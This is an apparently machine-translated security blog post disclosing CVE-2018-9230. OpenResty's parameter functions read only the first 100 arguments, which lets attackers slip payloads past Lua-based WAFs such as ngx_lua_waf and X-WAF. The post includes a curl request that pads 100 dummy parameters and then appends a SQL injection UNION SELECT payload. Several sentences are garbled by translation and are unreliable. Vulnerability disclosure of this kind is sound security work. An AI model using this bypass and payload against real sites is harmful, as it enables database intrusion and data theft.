The original starting in safety, link: www.anquanke.com/post/id/103…
0 x00 preface
OpenResty® is a high-performance Web platform based on Nginx and Lua that integrates a large number of excellent Lua libraries, third-party modules, and most of the dependencies.
OpenResty website: openresty.org
Vulnerability number: CVE-2018-9230
Get_uri_args and ngx.req.get_post_args to obtain URI parameters and ignore parameter overflow, allowing remote attackers to bypass OpenResty-based security protection and affecting multiple open source WAFs.
Version: OpenResty full version
0x01 Environment Setup
Operating environment: CentOS6
Source code version: openresty.org/download/op… (Latest version on official website)
0x02 Vulnerability Details
A. Obtaining URI parameters
Looking at the official API documentation first, there are two ways to get a URI: Get_uri_args, ngx.req.get_post_args, ngx.req. Get_uri_args, ngx.req. Get_uri_args, ngx.req. Get_uri_args, ngx.req. Get_uri_args, ngx.req. Get_uri_args, ngx.req. Get_uri_args, ngx.req. Ngx.req. get_post_args gets the content from the POST request.
Test cases:
server {
listen 80;
server_name localhost;
location /test {
content_by_lua_block {
local arg = ngx.req.get_uri_args()
for k,v in pairs(arg) do
ngx.say("[GET ] key:", k, " v:", v)
end
ngx.req.read_body()
local arg = ngx.req.get_post_args()
for k,v in pairs(arg) do
ngx.say("[POST] key:", k, " v:", v)
end
}
}
}
Copy the code
Output test:
B. Parameter case
When submitting the same parameter ID, sort according to the order in which the parameters are received,
However, when the parameter ID is case-sensitive, such as id, id, id, it will be treated as a different parameter.
Here, parameter capitalization is introduced for further construction and understanding of test cases.
C. Parameter overflow
So what happens if we don’t fill in the parameters, so I’ve constructed a test case for demonstration purposes, A0-a9, 10*10, 100 parameters, and then add the 101st parameter, SQL injection Payload, and let’s see what happens?
Test cases:
The curl ‘127.0.0.1 / test? a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0& a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1& a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2& a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3& a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4& a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5& a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6& a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7& a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8& a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9& id=1 union select 1,schema_name,3 from INFORMATION_SCHEMA.schemata’
Output result:
As you can see, when ngx.req.get_uri_args is used to retrieve uri request parameters, only the first 100 parameters are retrieved. The 101st parameter is not retrieved. To construct a POST request, let’s see:
The content of the POST request obtained with ngx.req.get_post_args also gets only the first 100 parameters.
Check the documentation for both functions. The default limit is 100 for security reasons, and they accept an optional argument that tells it at most how many GET/POST arguments it should parse. However, an attacker can easily bypass OpenResty-based security as long as the number of parameters constructed exceeds the limit, which presents a uri parameter overflow problem.
Get_uri_args and ngx.req.get_post_args are used to obtain URI parameters. When the number of submitted parameters exceeds the limit (the default limit is 100 or the limit of optional parameters), uri parameters overflow and parameters beyond the limit cannot be obtained. Moreover, it cannot effectively detect the parameters constructed by the attacker, thus bypassing openResty-based WEB security.
0x03 Product Is Affected
Get_uri_args and ngx.req. Get_post_args are used to obtain URI parameters, namely the default limit of 100, without considering parameter overflow. Attackers can construct parameters that exceed the limit. Easily bypassing security.
Open source WaFs based on OpenResty, such as ngx_Lua_waf, X-WAf, And Openstar, are affected.
A, ngx_lua_waf
Ngx_lua_waf is a Web application firewall based on Lua-Nginx-Module (OpenReSTY)
Github source: github.com/loveshell/n…
Intercept effect picture:
Use parameter overflow Bypass:
B, X – WAF
X-waf is a cloud WAF system suitable for small and medium enterprises, so that small and medium enterprises can also have their own free cloud WAF very convenient.
Liverpoolfc.tv: waf. Xsec. IO
Github source: github.com/xsec-lab/x-…
Intercept effect picture:
Use parameter overflow Bypass:
This article is originally published by Bypass.www.cnblogs.com/xiaozi/p/91…Welcome to share this article, reprint please reserve source.
About me: A network security enthusiast, dedicated to sharing original high-quality dry goods, welcome to follow my personal wechat public account: Bypass–, browse more wonderful articles.